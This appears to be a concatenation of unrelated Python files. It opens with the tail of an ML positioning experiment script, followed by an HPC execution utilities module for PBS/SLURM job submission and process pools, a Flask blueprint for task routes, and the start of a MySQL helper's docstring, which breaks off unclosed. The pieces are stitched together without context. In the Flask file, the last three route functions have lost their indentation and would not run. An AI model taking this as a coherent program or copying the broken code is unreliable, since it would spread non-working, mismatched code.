        test_score = score_predictions(y_true, y_pred, ml_parameters["validation_metric"])
        # Rescale from normalized grid units to meters.
        test_score *= data_parameters["pos_grid"][0]
        test_95_perc = get_95th_percentile(
            y_true,
            y_pred,
            rescale_factor=data_parameters["pos_grid"][0]
        )
        logging.info("Average test distance: %.5f m || 95th percentile: %.5f m\n",
            test_score, test_95_perc)
    predictions_file = os.path.join(
        ml_parameters["model_folder"],
        experiment_name + '_' + experiment_settings["predictions_file"]
    )
    with open(predictions_file, 'wb') as data_file:
        pickle.dump([y_true, y_pred], data_file)
    # Prints elapsed time
    end = time.time()
    exec_time = (end-start)
    logging.info("Total execution time: %.5E seconds", exec_time)
# Script entry point.
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""
Execution utilities.
"""
import multiprocessing
import concurrent.futures as cf
import subprocess
import logging
import gc
from math import floor
import os
import psutil
import getpass
import shlex
from warnings import warn
from rex.utilities.loggers import LOGGERS, log_mem
from rex.utilities.exceptions import (ExecutionError, SlurmWarning,
ParallelExecutionWarning)
logger = logging.getLogger(__name__)
class SubprocessManager:
    """Base class to handle subprocess execution."""

    # get username as class attribute.
    USER = getpass.getuser()

    @staticmethod
    def make_path(d):
        """Make a directory tree if it doesn't exist.

        Parameters
        ----------
        d : str
            Directory tree to check and potentially create.
        """
        if not os.path.exists(d):
            os.makedirs(d)

    @staticmethod
    def make_sh(fname, script):
        """Make a shell script (.sh file) to execute a subprocess.

        Parameters
        ----------
        fname : str
            Name of the .sh file to create.
        script : str
            Contents to be written into the .sh file.
        """
        logger.debug('The shell script "{n}" contains the following:\n'
                     '~~~~~~~~~~ {n} ~~~~~~~~~~\n'
                     '{s}\n'
                     '~~~~~~~~~~ {n} ~~~~~~~~~~'
                     .format(n=fname, s=script))
        with open(fname, 'w+') as f:
            f.write(script)

    @staticmethod
    def rm(fname):
        """Remove a file.

        Parameters
        ----------
        fname : str
            Filename (with path) to remove.
        """
        os.remove(fname)

    @staticmethod
    def _subproc_popen(cmd):
        """Open a subprocess popen constructor and submit a command.

        Parameters
        ----------
        cmd : str
            Command to be submitted using python subprocess.

        Returns
        -------
        stdout : str
            Subprocess standard output. This is decoded from the subprocess
            stdout with rstrip.
        stderr : str
            Subprocess standard error. This is decoded from the subprocess
            stderr with rstrip. After decoding/rstrip, this will be empty if
            the subprocess doesn't return an error.

        Raises
        ------
        OSError
            If the subprocess exits with a non-zero return code.
        """
        cmd = shlex.split(cmd)

        # use subprocess to submit command and get piped o/e
        process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        stderr = stderr.decode('ascii').rstrip()
        stdout = stdout.decode('ascii').rstrip()

        if process.returncode != 0:
            raise OSError('Subprocess submission failed with return code {} '
                          'and stderr:\n{}'
                          .format(process.returncode, stderr))

        return stdout, stderr

    @staticmethod
    def _subproc_run(cmd, background=False, background_stdout=False,
                     shell=True):
        """Open a subprocess and submit a command.

        Parameters
        ----------
        cmd : str
            Command to be submitted using python subprocess.
        background : bool
            Flag to submit subprocess in the background. stdout stderr will
            be empty strings if this is True.
        background_stdout : bool
            Flag to capture the stdout/stderr from the background process
            in a nohup.out file.
        shell : bool
            Flag to run the command through the shell. Forced to True when
            the command is wrapped in a nohup background invocation.
        """
        nohup_cmd = None

        if background and background_stdout:
            nohup_cmd = 'nohup {} &'
        elif background and not background_stdout:
            nohup_cmd = 'nohup {} </dev/null >/dev/null 2>&1 &'

        if nohup_cmd is not None:
            cmd = nohup_cmd.format(cmd)
            # nohup redirection syntax requires the shell
            shell = True

        subprocess.run(cmd, shell=shell)

    @staticmethod
    def submit(cmd, background=False, background_stdout=False):
        """Open a subprocess and submit a command.

        Parameters
        ----------
        cmd : str
            Command to be submitted using python subprocess.
        background : bool
            Flag to submit subprocess in the background. stdout stderr will
            be empty strings if this is True.
        background_stdout : bool
            Flag to capture the stdout/stderr from the background process
            in a nohup.out file.

        Returns
        -------
        stdout : str
            Subprocess standard output. This is decoded from the subprocess
            stdout with rstrip.
        stderr : str
            Subprocess standard error. This is decoded from the subprocess
            stderr with rstrip. After decoding/rstrip, this will be empty if
            the subprocess doesn't return an error.
        """
        if background:
            SubprocessManager._subproc_run(
                cmd, background=background,
                background_stdout=background_stdout)
            stdout, stderr = '', ''
        else:
            stdout, stderr = SubprocessManager._subproc_popen(cmd)

        return stdout, stderr

    @staticmethod
    def s(s):
        """Format input as str w/ appropriate quote types for python cli entry.

        Examples
        --------
            list, tuple -> "['one', 'two']"
            dict -> "{'key': 'val'}"
            int, float, None -> '0'
            str, other -> 'string'
        """
        if isinstance(s, (list, tuple, dict)):
            return '"{}"'.format(s)
        elif not isinstance(s, (int, float, type(None))):
            return "'{}'".format(s)
        else:
            return '{}'.format(s)

    @staticmethod
    def format_walltime(hours):
        """Get the SLURM walltime string in format "HH:MM:SS"

        Parameters
        ----------
        hours : float | int
            Requested number of job hours.

        Returns
        -------
        walltime : str
            SLURM walltime request in format "HH:MM:SS"
        """
        # Work in whole minutes so the minutes field can never overflow:
        # the previous floor(hours)/round(fraction) split produced invalid
        # strings like "00:60:00" for hours=0.999 instead of "01:00:00".
        total_minutes = int(round(hours * 60))
        hh, mm = divmod(total_minutes, 60)
        return '{:02d}:{:02d}:00'.format(hh, mm)
class PBS(SubprocessManager):
    """Subclass for PBS subprocess jobs."""

    def __init__(self, cmd, alloc, queue, name='reV',
                 feature=None, stdout_path='./stdout'):
        """Initialize and submit a PBS job.

        Parameters
        ----------
        cmd : str
            Command to be submitted in PBS shell script. Example:
            'python -m reV.generation.cli_gen'
        alloc : str
            HPC allocation account. Example: 'rev'.
        queue : str
            HPC queue to submit job to. Example: 'short', 'batch-h', etc...
        name : str
            PBS job name.
        feature : str | None
            PBS feature request (-l {feature}).
            Example: 'feature=24core', 'qos=high', etc...
        stdout_path : str
            Path to print .stdout and .stderr files.
        """
        self.make_path(stdout_path)
        # Submit immediately on construction; qsub() returns the job id
        # (stdout of the qsub command) and any submission error string.
        self.id, self.err = self.qsub(cmd,
                                      alloc=alloc,
                                      queue=queue,
                                      name=name,
                                      feature=feature,
                                      stdout_path=stdout_path)

    @staticmethod
    def check_status(job, var='id'):
        """Check the status of this PBS job using qstat.

        Parameters
        ----------
        job : str
            Job name or ID number.
        var : str
            Identity/type of job identification input arg ('id' or 'name').

        Returns
        -------
        out : str or NoneType
            Qstat job status character or None if not found.
            Common status codes: Q, R, C (queued, running, complete).
        """
        # column location of various job identifiers
        col_loc = {'id': 0, 'name': 3}
        qstat_rows = PBS.qstat()
        if qstat_rows is None:
            return None
        else:
            # reverse the list so most recent jobs are first
            qstat_rows = reversed(qstat_rows)

        # update job status from qstat list
        for row in qstat_rows:
            row = row.split()
            # make sure the row is long enough to be a job status listing
            if len(row) > 10:
                if row[col_loc[var]].strip() == job.strip():
                    # Job status is located at the -2 index
                    status = row[-2]
                    logger.debug('Job with {} "{}" has status: "{}"'
                                 .format(var, job, status))
                    return status

        return None

    @staticmethod
    def qstat():
        """Run the PBS qstat command and return the stdout split to rows.

        Returns
        -------
        qstat_rows : list | None
            List of strings where each string is a row in the qstat printout.
            Returns None if qstat is empty.
        """
        cmd = 'qstat -u {user}'.format(user=PBS.USER)
        stdout, _ = PBS.submit(cmd)
        if not stdout:
            # No jobs are currently running.
            return None
        else:
            qstat_rows = stdout.split('\n')
            return qstat_rows

    def qsub(self, cmd, alloc, queue, name='reV', feature=None,
             stdout_path='./stdout', keep_sh=False):
        """Submit a PBS job via qsub command and PBS shell script

        Parameters
        ----------
        cmd : str
            Command to be submitted in PBS shell script. Example:
            'python -m reV.generation.cli_gen'
        alloc : str
            HPC allocation account. Example: 'rev'.
        queue : str
            HPC queue to submit job to. Example: 'short', 'batch-h', etc...
        name : str
            PBS job name.
        feature : str | None
            PBS feature request (-l {feature}).
            Example: 'feature=24core', 'qos=high', etc...
        stdout_path : str
            Path to print .stdout and .stderr files.
        keep_sh : bool
            Boolean to keep the .sh files. Default is to remove these files
            after job submission.

        Returns
        -------
        out : str
            qsub standard output, this is typically the PBS job ID.
        err : str
            qsub standard error, this is typically an empty string if the job
            was submitted successfully.
        """
        # Do not re-submit a job that is already queued or running under
        # the same name.
        status = self.check_status(name, var='name')

        if status in ('Q', 'R'):
            warn('Not submitting job "{}" because it is already in '
                 'qstat with status: "{}"'.format(name, status))
            out = None
            err = 'already_running'
        else:
            # feature_str is built unconditionally but only spliced into
            # the script when feature is truthy (see L= below).
            feature_str = '#PBS -l {}\n'.format(str(feature).replace(' ', ''))
            fname = '{}.sh'.format(name)
            script = ('#!/bin/bash\n'
                      '#PBS -N {n} # job name\n'
                      '#PBS -A {a} # allocation account\n'
                      '#PBS -q {q} # queue (debug, short, batch, or long)\n'
                      '#PBS -o {p}/{n}_$PBS_JOBID.o\n'
                      '#PBS -e {p}/{n}_$PBS_JOBID.e\n'
                      '{L}'
                      'echo Running on: $HOSTNAME, Machine Type: $MACHTYPE\n'
                      '{cmd}'
                      .format(n=name, a=alloc, q=queue, p=stdout_path,
                              L=feature_str if feature else '',
                              cmd=cmd))

            # write the shell script file and submit as qsub job
            self.make_sh(fname, script)
            out, err = self.submit('qsub {script}'.format(script=fname))

            if not err:
                logger.debug('PBS job "{}" with id #{} submitted successfully'
                             .format(name, out))
                # the .sh file is only a submission vehicle; remove it
                # unless the caller asked to keep it for debugging
                if not keep_sh:
                    self.rm(fname)

        return out, err
class SLURM(SubprocessManager):
    """Subclass for SLURM subprocess jobs."""

    def __init__(self, cmd, alloc, walltime, memory=None, feature=None,
                 name='reV', stdout_path='./stdout', conda_env=None,
                 module=None, module_root='/shared-projects/rev/modulefiles'):
        """Initialize and submit a SLURM job.

        Parameters
        ----------
        cmd : str
            Command to be submitted in SLURM shell script. Example:
            'python -m reV.generation.cli_gen'
        alloc : str
            HPC project (allocation) handle. Example: 'rev'.
        walltime : float
            Node walltime request in hours.
        memory : int, Optional
            Node memory request in GB.
        feature : str
            Additional flags for SLURM job. Format is "--qos=high"
            or "--depend=[state:job_id]". Default is None.
        name : str
            SLURM job name.
        stdout_path : str
            Path to print .stdout and .stderr files.
        conda_env : str
            Conda environment to activate
        module : str
            Module to load
        module_root : str
            Path to module root to load
        """
        self.make_path(stdout_path)
        # Submit on construction; sbatch() returns the raw sbatch stdout
        # (e.g. "Submitted batch job 12345") and any error string.
        self.out, self.err = self.sbatch(cmd,
                                         alloc=alloc,
                                         memory=memory,
                                         walltime=walltime,
                                         feature=feature,
                                         name=name,
                                         stdout_path=stdout_path,
                                         conda_env=conda_env,
                                         module=module,
                                         module_root=module_root)
        if self.out:
            # the job id is the last whitespace-separated token of the
            # sbatch stdout
            self.id = self.out.split(' ')[-1]
        else:
            self.id = None

    @staticmethod
    def check_status(job, var='id'):
        """Check the status of a SLURM job using squeue.

        Parameters
        ----------
        job : str
            Job name or ID number.
        var : str
            Identity/type of job identification input arg ('id' or 'name').

        Returns
        -------
        out : str | NoneType
            squeue job status str or None if not found.
            Common status codes: PD, R, CG (pending, running, complete).
        """
        # column location of various job identifiers
        col_loc = {'id': 0, 'name': 2}

        if var == 'name':
            # check for specific name
            squeue_rows = SLURM.squeue(name=job)
        else:
            squeue_rows = SLURM.squeue()

        if squeue_rows is None:
            return None
        else:
            # reverse the list so most recent jobs are first
            squeue_rows = reversed(squeue_rows)

        # update job status from squeue list
        for row in squeue_rows:
            row = row.split()
            # make sure the row is long enough to be a job status listing
            if len(row) > 7:
                # NOTE(review): substring membership ('in') tolerates
                # squeue's truncation of long job names, but for var='id'
                # it can also match an id that is merely a substring of
                # `job` -- confirm whether '==' was intended for ids
                # (the PBS equivalent uses '==').
                if row[col_loc[var]].strip() in job.strip():
                    # Job status is located at the 4 index
                    status = row[4]
                    logger.debug('Job with {} "{}" has status: "{}"'
                                 .format(var, job, status))
                    return row[4]

        return None

    @staticmethod
    def squeue(name=None):
        """Run the SLURM squeue command and return the stdout split to rows.

        Parameters
        ----------
        name : str | None
            Optional to check the squeue for a specific job name (not limited
            to the 8 shown characters) or show users whole squeue.

        Returns
        -------
        squeue_rows : list | None
            List of strings where each string is a row in the squeue printout.
            Returns None if squeue is empty.
        """
        cmd = ('squeue -u {user}{job_name}'
               .format(user=SLURM.USER,
                       job_name=' -n {}'.format(name) if name else ''))
        stdout, _ = SLURM.submit(cmd)
        if not stdout:
            # No jobs are currently running.
            return None
        else:
            squeue_rows = stdout.split('\n')
            return squeue_rows

    @staticmethod
    def scontrol(cmd):
        """Submit an scontrol command.

        Parameters
        ----------
        cmd : str
            Command string after "scontrol" word
        """
        cmd = 'scontrol {}'.format(cmd)
        cmd = shlex.split(cmd)
        subprocess.call(cmd)

    @staticmethod
    def scancel(arg):
        """Cancel a slurm job.

        Parameters
        ----------
        arg : int | list | str
            SLURM job id(s) to cancel. Can be a list of integer job ids, 'all'
            to cancel all jobs, or a feature (-p short) to cancel all jobs
            with a given feature
        """
        if isinstance(arg, (list, tuple)):
            # recurse over each job id in the collection
            for jid in arg:
                SLURM.scancel(jid)

        elif str(arg).lower() == 'all':
            # skip the squeue header row, then cancel each listed job id
            sq = SLURM.squeue()
            for row in sq[1:]:
                job_id = int(row.strip().split(' ')[0])
                SLURM.scancel(job_id)

        elif isinstance(arg, (int, str)):
            cmd = ('scancel {}'.format(arg))
            cmd = shlex.split(cmd)
            subprocess.call(cmd)

        else:
            e = ('Could not cancel: {} with type {}'
                 .format(arg, type(arg)))
            logger.error(e)
            raise ExecutionError(e)

    @staticmethod
    def change_qos(arg, qos):
        """Change the priority (quality of service) for a job.

        Parameters
        ----------
        arg : int | list | str
            SLURM job id(s) to change qos for. Can be 'all' for all jobs.
        qos : str
            New qos value
        """
        if isinstance(arg, (list, tuple)):
            for jid in arg:
                SLURM.change_qos(jid, qos)

        elif isinstance(arg, int):
            cmd = 'update job {} QOS={}'.format(arg, qos)
            SLURM.scontrol(cmd)

        elif str(arg).lower() == 'all':
            # only pending (PD) jobs can have their qos changed
            sq = SLURM.squeue()
            for row in sq[1:]:
                row_list = [x for x in row.strip().split(' ') if x != '']
                job_id = int(row_list[0])
                status = row_list[4]
                if status == 'PD':
                    SLURM.change_qos(job_id, qos)

        else:
            e = ('Could not change qos of: {} with type {}'
                 .format(arg, type(arg)))
            logger.error(e)
            raise ExecutionError(e)

    @staticmethod
    def hold(arg):
        """Temporarily hold a job from submitting. Held jobs will stay in queue
        but will not get nodes until released.

        Parameters
        ----------
        arg : int | list | str
            SLURM job id(s) to hold. Can be 'all' to hold all jobs.
        """
        if isinstance(arg, (list, tuple)):
            for jid in arg:
                SLURM.hold(jid)

        elif isinstance(arg, int):
            cmd = 'hold {}'.format(arg)
            SLURM.scontrol(cmd)

        elif str(arg).lower() == 'all':
            # only pending (PD) jobs can be held
            sq = SLURM.squeue()
            for row in sq[1:]:
                row_list = [x for x in row.strip().split(' ') if x != '']
                job_id = int(row_list[0])
                status = row_list[4]
                if status == 'PD':
                    SLURM.hold(job_id)

        else:
            e = ('Could not hold: {} with type {}'
                 .format(arg, type(arg)))
            logger.error(e)
            raise ExecutionError(e)

    @staticmethod
    def release(arg):
        """Release a job that was previously on hold so it will be submitted
        to a compute node.

        Parameters
        ----------
        arg : int | list | str
            SLURM job id(s) to release. Can be 'all' to release all jobs.
        """
        if isinstance(arg, (list, tuple)):
            for jid in arg:
                SLURM.release(jid)

        elif isinstance(arg, int):
            cmd = 'release {}'.format(arg)
            SLURM.scontrol(cmd)

        elif str(arg).lower() == 'all':
            # only release jobs that are pending because they were held
            sq = SLURM.squeue()
            for row in sq[1:]:
                row_list = [x for x in row.strip().split(' ') if x != '']
                job_id = int(row_list[0])
                status = row_list[4]
                reason = row_list[-1]
                if status == 'PD' and 'jobheld' in reason.lower():
                    SLURM.release(job_id)

        else:
            e = ('Could not release: {} with type {}'
                 .format(arg, type(arg)))
            logger.error(e)
            raise ExecutionError(e)

    def sbatch(self, cmd, alloc, walltime, memory=None, feature=None,
               name='reV', stdout_path='./stdout', keep_sh=False,
               conda_env=None, module=None,
               module_root='/shared-projects/rev/modulefiles'):
        """Submit a SLURM job via sbatch command and SLURM shell script

        Parameters
        ----------
        cmd : str
            Command to be submitted in SLURM shell script. Example:
            'python -m reV.generation.cli_gen'
        alloc : str
            HPC project (allocation) handle. Example: 'rev'.
        walltime : float
            Node walltime request in hours.
        memory : int
            Node memory request in GB.
        feature : str
            Additional flags for SLURM job. Format is "--qos=high"
            or "--depend=[state:job_id]". Default is None.
        name : str
            SLURM job name.
        stdout_path : str
            Path to print .stdout and .stderr files.
        keep_sh : bool
            Boolean to keep the .sh files. Default is to remove these files
            after job submission.
        conda_env : str
            Conda environment to activate
        module : bool
            Module to load
        module_root : str
            Path to module root to load

        Returns
        -------
        out : str
            sbatch standard output, this is typically the SLURM job ID.
        err : str
            sbatch standard error, this is typically an empty string if the
            job was submitted successfully.
        """
        # Do not re-submit a job that is already pending or running under
        # the same name.
        status = self.check_status(name, var='name')

        if status in ('PD', 'R'):
            warn('Not submitting job "{}" because it is already in '
                 'squeue with status: "{}"'.format(name, status))
            out = None
            err = 'already_running'
        else:
            feature_str = ''
            if feature is not None:
                feature_str = '#SBATCH {}  # extra feature\n'.format(feature)

            mem_str = ''
            if memory is not None:
                # SLURM --mem expects MB; input is GB
                mem_str = ('#SBATCH --mem={}  # node RAM in MB\n'
                           .format(int(memory * 1000)))

            # environment setup: module load takes precedence over a conda
            # environment when both are given
            env_str = ''
            if module is not None:
                env_str = ("echo module use {module_root}\n"
                           "module use {module_root}\n"
                           "echo module load {module}\n"
                           "module load {module}\n"
                           "echo module load complete!\n"
                           .format(module_root=module_root, module=module))
            elif conda_env is not None:
                env_str = ("echo source activate {conda_env}\n"
                           "source activate {conda_env}\n"
                           "echo conda env activate complete!\n"
                           .format(conda_env=conda_env))

            fname = '{}.sh'.format(name)
            script = ('#!/bin/bash\n'
                      '#SBATCH --account={a}  # allocation account\n'
                      '#SBATCH --time={t}  # walltime\n'
                      '#SBATCH --job-name={n}  # job name\n'
                      '#SBATCH --nodes=1  # number of nodes\n'
                      '#SBATCH --output={p}/{n}_%j.o\n'
                      '#SBATCH --error={p}/{n}_%j.e\n{m}{f}'
                      'echo Running on: $HOSTNAME, Machine Type: $MACHTYPE\n'
                      '{e}\n{cmd}'
                      .format(a=alloc, t=self.format_walltime(walltime),
                              n=name, p=stdout_path, m=mem_str,
                              f=feature_str, e=env_str, cmd=cmd))

            # write the shell script file and submit as sbatch job
            self.make_sh(fname, script)
            out, err = self.submit('sbatch {script}'.format(script=fname))

            if err:
                w = 'Received a SLURM error or warning: {}'.format(err)
                logger.warning(w)
                warn(w, SlurmWarning)
            else:
                logger.debug('SLURM job "{}" with id #{} submitted '
                             'successfully'.format(name, out))
                # the .sh file is only a submission vehicle; remove it
                # unless the caller asked to keep it for debugging
                if not keep_sh:
                    self.rm(fname)

        return out, err
class SpawnProcessPool(cf.ProcessPoolExecutor):
    """ProcessPoolExecutor variant that defaults to the 'spawn'
    multiprocessing start method instead of fork or forkserver."""

    def __init__(self, *args, loggers=None, **kwargs):
        """
        Parameters
        ----------
        loggers : str | list, optional
            logger(s) to initialize on workers, by default None
        """
        if 'mp_context' not in kwargs:
            # Default behavior: force the 'spawn' start method.
            kwargs['mp_context'] = multiprocessing.get_context('spawn')
        else:
            # The caller supplied an explicit context; respect it, but warn
            # that it overrides this class's reason for existing.
            w = ('SpawnProcessPool being initialized with mp_context: "{}". '
                 'This will override default SpawnProcessPool behavior.'
                 .format(kwargs['mp_context']))
            logger.warning(w)
            warn(w, ParallelExecutionWarning)

        if loggers is not None:
            # Re-initialize the requested loggers inside every worker.
            kwargs['initializer'] = LOGGERS.init_logger
            kwargs['initargs'] = (loggers, )

        super().__init__(*args, **kwargs)
def execute_parallel(fun, execution_iter, n_workers=None, **kwargs):
    """Fan a function out over an iterable using a spawn-based process pool.

    Parameters
    ----------
    fun : function
        Python function object that will be submitted to futures. See
        downstream execution methods for arg passing structure.
    execution_iter : iter
        Python iterator that controls the futures submitted in parallel.
    n_workers : int
        Number of workers to run in parallel
    **kwargs : dict
        Key word arguments passed to the fun.

    Returns
    -------
    results : list
        List of futures results.
    """
    with SpawnProcessPool(max_workers=n_workers) as executor:
        futures = []

        # Submit one execute_single() call per slice of the iterator.
        for worker_num, exec_slice in enumerate(execution_iter):
            logger.debug('Kicking off serial worker #{} for: {}'
                         .format(worker_num, exec_slice))
            futures.append(executor.submit(execute_single, fun, exec_slice,
                                           worker=worker_num, **kwargs))

        # Block until every submitted job has finished.
        results = [f.result() for f in futures]

    return results
def execute_single(fun, input_obj, worker=0, **kwargs):
    """Run one serial call of ``fun`` on a single core and log memory usage.

    Parameters
    ----------
    fun : function
        Function to execute.
    input_obj : object
        Object passed as first argument to fun. Typically a project control
        object that can be the result of iteration in the parallel execution
        framework.
    worker : int
        Worker number (for debugging purposes).
    **kwargs : dict
        Key word arguments passed to fun.

    Returns
    -------
    object
        Whatever ``fun(input_obj, **kwargs)`` returns.
    """
    logger.debug('Running single serial execution on worker #{} for: {}'
                 .format(worker, input_obj))

    result = fun(input_obj, **kwargs)
    log_mem()

    return result
class SmartParallelJob:
    """Single node parallel compute manager with smart data flushing."""

    def __init__(self, obj, execution_iter, n_workers=None, mem_util_lim=0.7):
        """Single node parallel compute manager with smart data flushing.

        Parameters
        ----------
        obj : object
            Python object that will be submitted to futures. Must have methods
            run(arg) and flush(). run(arg) must take the iteration result of
            execution_iter as the single positional argument. Additionally,
            the results of obj.run(arg) will be passed to obj.out. obj.out
            will be passed None when the memory is to be cleared. It is
            advisable that obj.run() be a @staticmethod for dramatically
            faster submission in parallel.
        execution_iter : iter
            Python iterator that controls the futures submitted in parallel.
        n_workers : int
            Number of workers to use in parallel. None will use all
            available workers.
        mem_util_lim : float
            Memory utilization limit (fractional). If the used memory divided
            by the total memory is greater than this value, the obj.out will
            be flushed and the local node memory will be cleared.
        """
        # fail fast if the duck-typed contract (run + flush) is not met
        if not hasattr(obj, 'run') or not hasattr(obj, 'flush'):
            raise ExecutionError('Parallel execution with object: "{}" '
                                 'failed. The target object must have methods '
                                 'run() and flush()'.format(obj))
        self._obj = obj
        self._execution_iter = execution_iter
        self._n_workers = n_workers
        self._mem_util_lim = mem_util_lim

    @property
    def execution_iter(self):
        """Get the iterator object that controls the parallel execution.

        Returns
        -------
        _execution_iter : iterable
            Iterable object that controls the processes of the parallel job.
        """
        return self._execution_iter

    @property
    def mem_util_lim(self):
        """Get the memory utilization limit (fractional).

        Returns
        -------
        _mem_util_lim : float
            Fractional memory utilization limit. If the used memory divided
            by the total memory is greater than this value, the obj.out will
            be flushed and the local node memory will be cleared.
        """
        return self._mem_util_lim

    @property
    def n_workers(self):
        """Get the number of workers in the local cluster.

        Returns
        -------
        _n_workers : int
            Number of workers. Default value is the number of CPU's.
        """
        # lazily default to all available CPUs on first access
        if self._n_workers is None:
            self._n_workers = os.cpu_count()
        return self._n_workers

    @property
    def obj(self):
        """Get the main python object that will be submitted to futures.

        Returns
        -------
        _obj : Object
            Python object that will be submitted to futures. Must have methods
            run(arg) and flush(). run(arg) must take the iteration result of
            execution_iter as the single positional argument. Additionally,
            the results of obj.run(arg) will be passed to obj.out. obj.out
            will be passed None when the memory is to be cleared. It is
            advisable that obj.run() be a @staticmethod for dramatically
            faster submission in parallel.
        """
        return self._obj

    def flush(self):
        """Flush obj.out to disk, set obj.out=None, and garbage collect."""
        # memory utilization limit exceeded, flush memory to disk
        self.obj.flush()
        self.obj.out = None
        gc.collect()

    def gather_and_flush(self, i, futures, force_flush=False):
        """Wait on futures, potentially update obj.out and flush to disk.

        Parameters
        ----------
        i : int | str
            Iteration number (for logging purposes).
        futures : list
            List of parallel future objects to wait on or gather.
        force_flush : bool
            Option to force a disk flush. Useful for end-of-iteration. If this
            is False, will only flush to disk if the memory utilization exceeds
            the mem_util_lim.

        Returns
        -------
        futures : list
            List of parallel future objects. If the memory was flushed, this is
            a cleared list: futures.clear()
        """
        # gather on each iteration so there is no big mem spike during flush
        # (obj.out should be a property setter that will append new data.)
        self.obj.out = [future.result() for future in futures]
        futures.clear()

        # useful log statements
        mem = psutil.virtual_memory()
        logger.info('Parallel run at iteration {0}. '
                    'Memory utilization is {1:.3f} GB out of {2:.3f} GB '
                    'total ({3:.1f}% used, limit of {4:.1f}%)'
                    .format(i, mem.used / 1e9, mem.total / 1e9,
                            100 * mem.used / mem.total,
                            100 * self.mem_util_lim))

        # check memory utilization against the limit
        if ((mem.used / mem.total) >= self.mem_util_lim) or force_flush:
            # restart client to free up memory
            # also seems to sync stderr messages (including warnings)
            # flush data to disk
            logger.info('Flushing memory to disk. The memory utilization is '
                        '{0:.2f}% and the limit is {1:.2f}%.'
                        .format(100 * (mem.used / mem.total),
                                100 * self.mem_util_lim))
            self.flush()

        return futures

    def run(self, **kwargs):
        """
        Run ParallelSmartJobs

        Parameters
        ----------
        kwargs : dict
            Keyword arguments to be passed to obj.run(). Makes it easier to
            have obj.run() as a @staticmethod.
        """
        # NOTE(review): len(self.execution_iter) requires a sized iterable;
        # a pure generator would raise TypeError here -- confirm callers
        # always pass something list-like.
        logger.info('Executing parallel run on a local cluster with '
                    '{0} workers over {1} total iterations.'
                    .format(self.n_workers, 1 + len(self.execution_iter)))
        log_mem()

        # initialize a client based on the input cluster.
        with SpawnProcessPool(max_workers=self.n_workers) as executor:
            futures = []

            # iterate through split executions, submitting each to worker
            for i, exec_slice in enumerate(self.execution_iter):
                logger.debug('Kicking off serial worker #{0} for: {1}. '
                             .format(i, exec_slice))

                # submit executions and append to futures list
                futures.append(executor.submit(self.obj.run, exec_slice,
                                               **kwargs))

                # Take a pause after one complete set of workers
                if (i + 1) % self.n_workers == 0:
                    futures = self.gather_and_flush(i, futures)

            # All futures complete
            self.gather_and_flush('END', futures, force_flush=True)

        logger.debug('Smart parallel job complete. Returning execution '
                     'control to higher level processes.')
        log_mem()

    @classmethod
    def execute(cls, obj, execution_iter, n_workers=None,
                mem_util_lim=0.7, **kwargs):
        """Execute the smart parallel run with data flushing.

        Parameters
        ----------
        obj : object
            Python object that will be submitted to futures. Must have methods
            run(arg) and flush(). run(arg) must take the iteration result of
            execution_iter as the single positional argument. Additionally,
            the results of obj.run(arg) will be passed to obj.out. obj.out
            will be passed None when the memory is to be cleared. It is
            advisable that obj.run() be a @staticmethod for dramatically
            faster submission in parallel.
        execution_iter : iter
            Python iterator that controls the futures submitted in parallel.
        n_workers : int
            Number of workers to scale the cluster to. None will use all
            available workers in a local cluster.
        mem_util_lim : float
            Memory utilization limit (fractional). If the used memory divided
            by the total memory is greater than this value, the obj.out will
            be flushed and the local node memory will be cleared.
        kwargs : dict
            Keyword arguments to be passed to obj.run(). Makes it easier to
            have obj.run() as a @staticmethod.
        """
        manager = cls(obj, execution_iter, n_workers=n_workers,
                      mem_util_lim=mem_util_lim)
        manager.run(**kwargs)
|
from flask import Flask, render_template, request, redirect
from flask import Blueprint
from repositories import task_repository, user_repository
from models.task import Task
# Blueprint grouping all task-related routes under one registrable unit.
tasks_blueprint = Blueprint("tasks", __name__)
@tasks_blueprint.route('/tasks')
def tasks():
    """Render the index view listing every task in the database."""
    all_tasks = task_repository.select_all()
    return render_template("tasks/index.html", all_tasks=all_tasks)
@tasks_blueprint.route('/tasks/new')
def new_task():
    """Render the new-task form, offering every user as a possible assignee."""
    all_users = user_repository.select_all()
    return render_template('tasks/new.html', all_users=all_users)
@tasks_blueprint.route('/tasks', methods=['POST'])
def create_task():
    """Create a Task from the submitted form data, save it, then redirect."""
    # Pull each field out of the POSTed form.
    description = request.form["description"]
    assignee_id = request.form["user"]
    duration = request.form["duration"]
    completed = request.form["completed"]

    # Resolve the submitted user id to a full user record.
    assignee = user_repository.select(assignee_id)

    # Build and persist the new task, then return to the task list.
    task_repository.save(Task(description, assignee, duration, completed))
    return redirect('/tasks')
@tasks_blueprint.route('/tasks/<id>')
def show_task(id):
    """Render the detail view for the task whose id is in the URL."""
    selected = task_repository.select(id)
    return render_template('tasks/show.html', selected_task=selected)
@tasks_blueprint.route("/tasks/<id>/edit", methods=['GET'])
def edit_task(id):
task = task_repository.select(id)
users = user_repository.select_all()
return render_template('tasks/edit.html', task = task, all_users = users)
@tasks_blueprint.route("/tasks/<id>", methods=['POST'])
def update_task(id):
description = request.form['description']
user_id = request.form['user_id']
duration = request.form['duration']
completed = request.form['completed']
user = user_repository.select(user_id)
task = Task(description, user, duration, completed, id)
task_repository.update(task)
return redirect('/tasks')
@tasks_blueprint.route("/tasks/<id>/delete", methods=['POST'])
def delete_task(id):
task_repository.delete(id)
return redirect('/tasks')
|
import MySQLdb
import re
"""
Connects to the MySQL database. Various functions to retrieve and update data.
Each function forms a new connection with the server, for ease of access
in project development.
Functions:
add_to_blacklist(word) - Inserts word into blacklist, if word already exists
will replace the row.
- Requires word argument as String. DOES NOT CHECK IF IS
SINGLE WORD - YET.
check_connection() - Checks that a connection can be established.
get_flags(userID, flagToGet) - Returns a boolean depending on value of specified
flag for that user
get_score(userID) - Returns the current score for a given userID
get_message - Returns the body of the message from the messageID
increase_score(userID, score) - Sets the score of a userID
- Requires UserID as int, score as int
mass_add_to_BL(fileToPush) - Mass inserts words from a text file
- Requires a path to text file given as String
- file must contain words to insert on separate lines
pull_blacklist() - Takes all word entries from black_list, ensures all
are lower case, and adds to blackList[]
set_flag(userID, flagToSet) - Sets the specified flag of a given user to 1
- Requires user ID as int or string, flagToSet as string
atm 'flag'
unset_flag(userID, flagToSet) - Sets the specified flag of a given user to 0
- Requires user ID as int or string, flagToSet as string
ie 'flag'
get_guardian_email(userID) - Returns guardian email string of given user
- Requires user ID as int or string
get_other(userId, messageId) - Returns user ID of other user that received the message
